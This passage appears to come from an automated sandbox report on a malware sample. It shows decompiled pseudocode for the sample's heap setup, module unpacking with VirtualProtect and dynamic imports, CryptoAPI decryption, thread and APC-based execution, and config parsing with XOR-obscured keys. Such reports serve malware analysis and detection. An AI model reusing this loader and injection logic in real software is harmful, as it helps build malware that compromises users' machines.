          • API String ID: 187446995-0
          • Opcode ID: 0e5c9b46720459bc8d8705291f93973b31c6c7d4975a4bac56c87d52f5443a3d
          • Instruction ID: e7a5753d369928028c772654b23a0d4e62a18c87eed03dc2cd27b81700bac8c8
          • Opcode Fuzzy Hash: 0e5c9b46720459bc8d8705291f93973b31c6c7d4975a4bac56c87d52f5443a3d
          • Instruction Fuzzy Hash: D9F0B47760019AFAEB15D6ABCC49EAF3EECEBC5745F500055E944D3140EB70DE029AB0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E5006 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E005E5006(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x5ea2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x5ea1c8 = GetTickCount();
				_t5 = E005E54D8(_a4);
				if(_t5 == 0) {
					_t5 = E005E213E(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E005E6392(_t9) != 0) {
							 *0x5ea300 = 1; // executed
						}
						_t7 = E005E2523(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}









          0x005e5006
          0x005e500f
          0x005e5015
          0x005e501c
          0x005e5020
          0x00000000
          0x005e5020
          0x005e502d
          0x005e5032
          0x005e5039
          0x005e503f
          0x005e5046
          0x005e504f
          0x005e5051
          0x005e5051
          0x005e505b
          0x00000000
          0x005e505b
          0x005e5046
          0x005e5060

          APIs
          • HeapCreate.KERNELBASE(00000000,00400000,00000000,005E107E,?), ref: 005E500F
          • GetTickCount.KERNEL32 ref: 005E5023
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: CountCreateHeapTick
          • String ID:
          • API String ID: 2177101570-0
          • Opcode ID: a6a87ba267cd212c3f8bf499eaec98a309bc0131a0a152722327569f78f95d37
          • Instruction ID: a43707b6fb4944e01d441dffe3bf5eb1e2ba049d354c31760f49a1ca8f769cd1
          • Opcode Fuzzy Hash: a6a87ba267cd212c3f8bf499eaec98a309bc0131a0a152722327569f78f95d37
          • Instruction Fuzzy Hash: 4DF02B30540BC2DADB6D2B339C9D7053F947FA4748F504415F9C1D8092FB70E808EA21
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005C0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
          Download Yara Rule
          APIs
          • SetErrorMode.KERNELBASE(00000400,?,?,005C0223,?,?), ref: 005C0E19
          • SetErrorMode.KERNELBASE(00000000,?,?,005C0223,?,?), ref: 005C0E1E
          Memory Dump Source
          • Source File: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5c0000_server_(3).jbxd
          Yara matches
          Similarity
          • API ID: ErrorMode
          • String ID:
          • API String ID: 2340568224-0
          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
          • Instruction ID: 62d43324511f6a0460b43ce37119c2a39e606a598f81983a70edaf776378af12
          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
          • Instruction Fuzzy Hash: 17D01231145128B7D7003AD4DC09BCD7F1CDF05B62F008411FB0DD9080C770994046E5
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E2839 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
          Download Yara Rule
          C-Code - Quality: 34%
          			E005E2839(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x5ea348; // 0x25dd5a8
				_t4 = _t15 + 0x5eb3e8; // 0x2bc8990
				_t20 = _t4;
				_t6 = _t15 + 0x5eb174; // 0x650047
				_t17 = E005E790B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E005E661C(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










          0x005e2843
          0x005e284a
          0x005e284b
          0x005e284c
          0x005e284d
          0x005e2853
          0x005e2858
          0x005e2858
          0x005e2862
          0x005e2874
          0x005e287b
          0x005e28a9
          0x005e287d
          0x005e287f
          0x005e2884
          0x005e28a6
          0x005e2886
          0x005e2889
          0x005e2890
          0x005e2895
          0x005e2897
          0x005e2897
          0x005e289c
          0x005e289c
          0x005e2884
          0x005e28b0

          APIs
            • Part of subcall function 005E790B: SysFreeString.OLEAUT32(?), ref: 005E79EA
            • Part of subcall function 005E661C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,005E4B72,004F0053,00000000,?), ref: 005E6625
            • Part of subcall function 005E661C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,005E4B72,004F0053,00000000,?), ref: 005E664F
            • Part of subcall function 005E661C: memset.NTDLL ref: 005E6663
          • SysFreeString.OLEAUT32(00000000), ref: 005E289C
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: FreeString$lstrlenmemcpymemset
          • String ID:
          • API String ID: 397948122-0
          • Opcode ID: 49c1c08d60e7f12e544e0e2aecc5e8d523e1ac56c8d40376c114b941bef8434a
          • Instruction ID: a4fe3e465a4c762c71042005412b49781e968128990b0280597625994cb06f58
          • Opcode Fuzzy Hash: 49c1c08d60e7f12e544e0e2aecc5e8d523e1ac56c8d40376c114b941bef8434a
          • Instruction Fuzzy Hash: 40019E72904259BFDB499FA6CC449AABBB8FF58350F000425E981E7061E7719911C790
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00401D3C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
          Download Yara Rule
          C-Code - Quality: 37%
          			E00401D3C(void* __eax, intOrPtr _a4) {

				 *0x404190 =  *0x404190 & 0x00000000;
				_push(0);
				_push(0x40418c);
				_push(1);
				_push(_a4);
				 *0x404188 = 0xc; // executed
				L00401682(); // executed
				return __eax;
			}



          0x00401d3c
          0x00401d43
          0x00401d45
          0x00401d4a
          0x00401d4c
          0x00401d50
          0x00401d5a
          0x00401d5f

          APIs
          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: DescriptorSecurity$ConvertString
          • String ID:
          • API String ID: 3907675253-0
          • Opcode ID: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
          • Instruction ID: 8b1a9882f0f7b6f5a619b3d6300b2bdd32795284b236dc0e31706888a106ff8d
          • Opcode Fuzzy Hash: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
          • Instruction Fuzzy Hash: AFC04CF4140300B7E620AB409D5AF057A5577A4715F61062DFB04391E1C3F91094952D
          Uniqueness

          Uniqueness Score: -1.00%

          Function 004012E6 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E004012E6(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x404160, 0, _a4); // executed
				return _t2;
			}




          0x004012f2
          0x004012f8

          APIs
          • RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: AllocateHeap
          • String ID:
          • API String ID: 1279760036-0
          • Opcode ID: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
          • Instruction ID: e72f98105ba7c706faca8ef9926cddb4ff6cd2f9e0c1ce1923eff6ceed1ee1be
          • Opcode Fuzzy Hash: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
          • Instruction Fuzzy Hash: 92B012B1100100ABCA118F11EF08F06BE31B7E4701F004030B3042407482314C20FB1D
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00401BA9 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E00401BA9(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x404160, 0, _a4); // executed
				return _t2;
			}




          0x00401bb5
          0x00401bbb

          APIs
          • RtlFreeHeap.NTDLL(00000000,00000030,004017ED,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401A66), ref: 00401BB5
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: FreeHeap
          • String ID:
          • API String ID: 3298025750-0
          • Opcode ID: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
          • Instruction ID: ce698fd0423bda5088509b7a42681047dd9c8e559710f82c1ef419a06116bbed
          • Opcode Fuzzy Hash: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
          • Instruction Fuzzy Hash: 8AB01271000100BBCA118F10EF08F067F21B7E4701F008030B3046407482314D60FB0C
          Uniqueness

          Uniqueness Score: -1.00%

          Function 004012FB Relevance: 1.3, APIs: 1, Instructions: 70COMMON
          Download Yara Rule
          C-Code - Quality: 86%
          			E004012FB(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				void* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x404180;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E00401BC4(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E00401000(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E004014CF(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E00401BA9(_t42);
					L8:
					return _t29;
				}
			}














          0x00401303
          0x00401305
          0x00401321
          0x00401332
          0x00401339
          0x00401397
          0x00000000
          0x0040133b
          0x0040133b
          0x00401345
          0x00401349
          0x0040134e
          0x00401351
          0x00401356
          0x0040135a
          0x0040135f
          0x00401364
          0x00401368
          0x0040136d
          0x0040136e
          0x00401372
          0x00401377
          0x0040137f
          0x0040137f
          0x00401377
          0x00401368
          0x0040135a
          0x00401381
          0x0040138a
          0x0040138e
          0x00401398
          0x0040139e
          0x0040139e

          APIs
            • Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
            • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
            • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
            • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
            • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
            • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
            • Part of subcall function 00401000: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
            • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
            • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
            • Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583
          • GetLastError.KERNEL32(?,?), ref: 00401379
          Memory Dump Source
          • Source File: 00000000.00000002.580483251.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.580483251.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.580483251.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_server_(3).jbxd
          Similarity
          • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
          • String ID:
          • API String ID: 3135819546-0
          • Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
          • Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
          • Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
          • Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E5063 Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
          Download Yara Rule
          C-Code - Quality: 75%
          			E005E5063(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E005E1508( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E005E33DC(_a8 + _a8);
					if(_t21 != 0) {
						E005E22EA(_a4, _t21, _t23);
					}
					E005E61DA(_a4);
				}
				return _t21;
			}





          0x005e506b
          0x005e5072
          0x005e5074
          0x005e5083
          0x005e508a
          0x005e5099
          0x005e509d
          0x005e50a4
          0x005e50a4
          0x005e50ac
          0x005e50b1
          0x005e50b6

          APIs
          • lstrlen.KERNEL32(00000000,00000000,005E3ECE,00000000,?,005E66D9,00000000,005E3ECE,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E5074
            • Part of subcall function 005E1508: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,005E5088,00000001,005E3ECE,00000000), ref: 005E1540
            • Part of subcall function 005E1508: memcpy.NTDLL(005E5088,005E3ECE,00000010,?,?,?,005E5088,00000001,005E3ECE,00000000,?,005E66D9,00000000,005E3ECE,?,775EC740), ref: 005E1559
            • Part of subcall function 005E1508: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 005E1582
            • Part of subcall function 005E1508: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 005E159A
            • Part of subcall function 005E1508: memcpy.NTDLL(00000000,775EC740,02BC9600,00000010), ref: 005E15EC
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
          • String ID:
          • API String ID: 894908221-0
          • Opcode ID: 5d47086869c23f055078d83bebdf914513b348135a1068be73ac04a0f19d1f1f
          • Instruction ID: a7f967d4b6f3a3207da6604cf006dcb9652fd8550e9ff3f83d375bbb9d9b4d15
          • Opcode Fuzzy Hash: 5d47086869c23f055078d83bebdf914513b348135a1068be73ac04a0f19d1f1f
          • Instruction Fuzzy Hash: 58F05E76100549BBCF16AF56DC48CDA3FADFFC83A5B008022FD49CA111DA71DA55DBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Non-executed Functions

          Function 005C1C58 Relevance: 21.2, APIs: 14, Instructions: 160threadsleepnativeCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 005C1FCF: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,005C1C63), ref: 005C1FDE
            • Part of subcall function 005C1FCF: GetVersion.KERNEL32(?,005C1C63), ref: 005C1FED
            • Part of subcall function 005C1FCF: GetCurrentProcessId.KERNEL32(?,005C1C63), ref: 005C2009
            • Part of subcall function 005C1FCF: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,005C1C63), ref: 005C2022
            • Part of subcall function 005C154D: RtlAllocateHeap.NTDLL(00000000,?,005C1477), ref: 005C1559
          • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 005C1C8D
          • Sleep.KERNEL32(00000000,00000030), ref: 005C1CD4
          • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 005C1CFC
          • GetSystemDefaultUILanguage.KERNEL32 ref: 005C1D06
          • VerLanguageNameA.KERNEL32(?,?,00000004), ref: 005C1D19
          • CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 005C1D8E
          • QueueUserAPC.KERNEL32(0040139F,00000000,?), ref: 005C1DA4
          • GetLastError.KERNEL32 ref: 005C1DB4
          • TerminateThread.KERNEL32(00000000,00000000), ref: 005C1DBE
          • SetLastError.KERNEL32(00000000), ref: 005C1DCA
          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 005C1DD7
          • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 005C1DE9
          • GetLastError.KERNEL32 ref: 005C1DF4
          • GetLastError.KERNEL32 ref: 005C1E05
          Memory Dump Source
          • Source File: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5c0000_server_(3).jbxd
          Yara matches
          Similarity
          • API ID: ErrorLast$Thread$CreateLanguageProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleNameObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
          • String ID:
          • API String ID: 1666582358-0
          • Opcode ID: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
          • Instruction ID: 9ad130e6b30d11179cc4a112adfdaee10a9e808b5d4e524764cc23cff6c52efa
          • Opcode Fuzzy Hash: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
          • Instruction Fuzzy Hash: B5519E75901A15AFE720EFF59D48EAFBE7CBB86751B104029F902E2152D730CE409BA8
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E1D8A Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258memoryCOMMONCrypto
          Download Yara Rule
          C-Code - Quality: 93%
          			E005E1D8A(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t116;
				void* _t119;
				intOrPtr _t122;

				_t119 = __esi;
				_t116 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x5ea344; // 0x43175ac3
				if(E005E10F8( &_v8,  &_v12, _t28 ^ 0xa23f04a7) != 0 && _v12 >= 0x110) {
					 *0x5ea374 = _v8;
				}
				_t33 =  *0x5ea344; // 0x43175ac3
				if(E005E10F8( &_v16,  &_v12, _t33 ^ 0x2bfce340) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x5ea344; // 0x43175ac3
				_push(_t116);
				if(E005E10F8( &_v12,  &_v8, _t39 ^ 0xcca68722) == 0) {
					L67:
					HeapFree( *0x5ea2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x5ea344; // 0x43175ac3
						_t45 = E005E36C5(_t104, _t102, _t98 ^ 0x523046bc);
					}
					_push(_t119);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x5ea2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x5ea344; // 0x43175ac3
						_t46 = E005E36C5(_t104, _t102, _t94 ^ 0x0b3e0d40);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x5ea2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x5ea344; // 0x43175ac3
						_t47 = E005E36C5(_t104, _t102, _t90 ^ 0x1b5903e6);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x5ea2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x5ea344; // 0x43175ac3
						_t48 = E005E36C5(_t104, _t102, _t86 ^ 0x267c2349);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x5ea004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x5ea344; // 0x43175ac3
						_t49 = E005E36C5(_t104, _t102, _t82 ^ 0x167db74c);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x5ea02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x5ea344; // 0x43175ac3
						_t50 = E005E36C5(_t104, _t102, _t78 ^ 0x02ddbcae);
					}
					if(_t50 == 0) {
						L41:
						 *0x5ea2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x5ea344; // 0x43175ac3
								_t51 = E005E36C5(_t104, _t102, _t75 ^ 0x0cbf33fd);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E005E5B85(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E005E607C();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x5ea344; // 0x43175ac3
								_t52 = E005E36C5(_t104, _t102, _t70 ^ 0x93710135);
							}
							if(_t52 != 0 && E005E5B85(0, _t52) != 0) {
								_t122 =  *0x5ea3cc; // 0x2bc9600
								E005E5364(_t122 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x5ea344; // 0x43175ac3
								_t53 = E005E36C5(_t104, _t102, _t65 ^ 0x175474b7);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x5ea348; // 0x25dd5a8
								_t22 = _t54 + 0x5eb5f3; // 0x616d692f
								 *0x5ea370 = _t22;
								goto L60;
							} else {
								_t64 = E005E5B85(0, _t53);
								 *0x5ea370 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x5ea344; // 0x43175ac3
										_t56 = E005E36C5(_t104, _t102, _t61 ^ 0xf8a29dde);
									}
									if(_t56 == 0) {
										_t57 =  *0x5ea348; // 0x25dd5a8
										_t23 = _t57 + 0x5eb899; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E005E5B85(0, _t56);
									}
									 *0x5ea3e0 = _t58;
									HeapFree( *0x5ea2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































          0x005e1d8a
          0x005e1d8a
          0x005e1d8a
          0x005e1d8a
          0x005e1d8d
          0x005e1daa
          0x005e1db8
          0x005e1db8
          0x005e1dbd
          0x005e1dd7
          0x005e2045
          0x005e204c
          0x005e2050
          0x005e2050
          0x005e1ddd
          0x005e1de2
          0x005e1dfa
          0x005e2032
          0x005e203c
          0x00000000
          0x005e1e00
          0x005e1e00
          0x005e1e01
          0x005e1e06
          0x005e1e1c
          0x005e1e08
          0x005e1e08
          0x005e1e15
          0x005e1e15
          0x005e1e1e
          0x005e1e27
          0x005e1e29
          0x005e1e33
          0x005e1e38
          0x005e1e38
          0x005e1e33
          0x005e1e3f
          0x005e1e55
          0x005e1e41
          0x005e1e41
          0x005e1e4e
          0x005e1e4e
          0x005e1e59
          0x005e1e5b
          0x005e1e65
          0x005e1e6a
          0x005e1e6a
          0x005e1e65
          0x005e1e71
          0x005e1e87
          0x005e1e73
          0x005e1e73
          0x005e1e80
          0x005e1e80
          0x005e1e8b
          0x005e1e8d
          0x005e1e97
          0x005e1e9c
          0x005e1e9c
          0x005e1e97
          0x005e1ea3
          0x005e1eb9
          0x005e1ea5
          0x005e1ea5
          0x005e1eb2
          0x005e1eb2
          0x005e1ebd
          0x005e1ebf
          0x005e1ec9
          0x005e1ece
          0x005e1ece
          0x005e1ec9
          0x005e1ed5
          0x005e1eeb
          0x005e1ed7
          0x005e1ed7
          0x005e1ee4
          0x005e1ee4
          0x005e1eef
          0x005e1ef1
          0x005e1efb
          0x005e1f00
          0x005e1f00
          0x005e1efb
